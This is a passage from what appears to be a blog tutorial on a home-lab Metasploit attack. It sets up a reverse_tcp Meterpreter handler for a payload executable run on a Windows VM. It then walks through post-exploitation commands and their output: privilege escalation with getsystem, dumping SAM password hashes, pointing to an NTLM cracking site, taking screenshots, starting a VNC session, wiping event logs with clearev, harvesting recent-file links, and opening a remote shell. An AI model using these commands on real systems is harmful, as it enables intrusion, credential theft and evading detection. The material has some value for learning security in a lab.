192_.gnmap  192_.nmap  192_.xml  Public  Templates  Videos  Pictures  Documents  Downloads  Music  Desktop  a  a.exe

Change into the shared folder and copy the file there, where it appears on the host side as well:

root@qzz:~# cd /mnt/hgfs/share1
root@qzz:/mnt/hgfs/share1# cp /root/a.exe a.exe
root@qzz:/mnt/hgfs/share1# ls
a.exe
2. Start the listener
root@qzz:~# msfdb run

Load the generic handler:

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) >

Show the options:

msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

Set the payload (it must match the one baked into a.exe):

msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp

Show the options again:

msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

Set the IP and port (the same LHOST and LPORT that were given to msfvenom):

msf5 exploit(multi/handler) > set LHOST xxx
LHOST => xxx
msf5 exploit(multi/handler) > set LPORT 6666
LPORT => 6666

Run: start the handler first, then copy a.exe to the Windows VM and double-click it; once it connects back, the following appears on the Kali side:

msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.xxx:6666 
[*] Sending stage (206403 bytes) to 192.168.xx.xxx
[*] Meterpreter session 1 opened (192.168.xxx:6666 -> 192.168.92.128:49543) at 2019-07-08 13:40:37 +0800

From here the Windows VM can be controlled remotely through the Meterpreter session.

meterpreter >

The following commands act on the Windows VM from the Meterpreter prompt:

(Type help to list all available commands.)

[References: https://www.cnblogs.com/backlion/p/9484949.html

https://www.freebuf.com/sectool/154752.html]

1) File system commands:

cd: change to a directory on the target;
cat: read a file's contents;
del: delete a file;
edit: edit a file (opens it in vim and writes it back);
ls: list the files in the current directory;
mkdir: create a directory;
rmdir: remove a directory

2) Upload and download files:

download: retrieves a file from the target system;
upload: pushes a file to the target system.

3) Obtain the password hashes:

(This step needs elevated privileges, as shown below.)

// elevate to SYSTEM (here via named-pipe impersonation)
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
// confirm the current user
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
// dump the local account hashes from the SAM
meterpreter > run post/windows/gather/hashdump

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY a08165ec0d8fd106e559a010fd77ed66...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...

// the hashes obtained
Administrator:500:aad3b435b51404eeaad3b435b51404ee:156e2a95f3c35674fb83ceb0693e39d2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
xxx:1001:aad3b435b51404eeaad3b435b51404ee:df49e8812a10e919756bfefed1e6c899:::

Output format: username:RID:LM hash:NT hash::: (the number after the username is the account's RID, not the full SID; 500 is the built-in Administrator, 501 Guest, and 1000 and up are locally created accounts).

Two constants are worth recognizing: aad3b435b51404eeaad3b435b51404ee in the LM field means no LM hash is stored (the default since Vista/2008), and 31d6cfe0d16ae931b73c59d7e0c089c0 in the NT field is the hash of an empty password, so Guest has a blank password here. The NT hash is an unsalted MD4 of the UTF-16LE password, so identical passwords always give identical hashes and one lookup table works across all users and machines.

NTLM cracking site: https://hashkiller.co.uk/Cracker

4) Screenshot (the second line shows where it was saved):

meterpreter > screenshot
Screenshot saved to: /root/noZfQkmZ.jpeg

5) Remote control over VNC (uploads a VNC server to the target and opens a viewer locally):

run vnc

6) Check whether the target is a virtual machine:

meterpreter > run post/windows/gather/checkvm

[*] Checking if WIN-PA5UULAVJOQ is a Virtual Machine .....
[+] This is a VMware Virtual Machine

7) Run a specified program (idletime shows how long the console user has been idle, i.e. whether anyone is likely to notice):

meterpreter > execute -f calc
Process 2128 created.
meterpreter > idletime
User has been idle for: 1 min 41 secs

8) System information:

meterpreter > sysinfo
Computer        : WIN-PA5UULAVJOQ
OS              : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows

9) Clear the event logs (wiping is itself logged: clearing the Security log leaves event 1102, and clearing the System or Application log leaves event 104 in the System log, so this is noisy rather than stealthy):

meterpreter > clearev
[*] Wiping 8 records from Application...
[*] Wiping 25 records from System...
[*] Wiping 14 records from Security...

10) See what the user has been doing (recent shortcut files):

meterpreter > run post/windows/gather/dumplinks

[*] Running module against WIN-PA5UULAVJOQ
[*] Running as SYSTEM extracting user list...
[*] Extracting lnk files for user Administrator at C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\...
[*] Processing: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\New Text Document.lnk.
[*] No Recent Office files found for user Administrator. Nothing to do.
[*] Extracting lnk files for user anyapei at C:\Users\anyapei\AppData\Roaming\Microsoft\Windows\Recent\...
[*] No Recent Office files found for user anyapei. Nothing to do.

11) shell drops straight into a cmd command line on the target.

meterpreter > shell
Process 1276 created.
Channel 13 created.
Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����

C:\Windows\system32>

The two lines above are mojibake: cmd writes in the console's OEM code page (936/GBK on a Chinese-locale Windows; the text is "Microsoft Windows [Version 6.1.7601]" and the copyright notice), while the Meterpreter side displays the bytes as UTF-8.

Switching the target console to UTF-8 fixes it:

chcp 65001

All articles on this blog, unless otherwise stated, are licensed under CC BY-SA 3.0. Please credit the source when republishing.
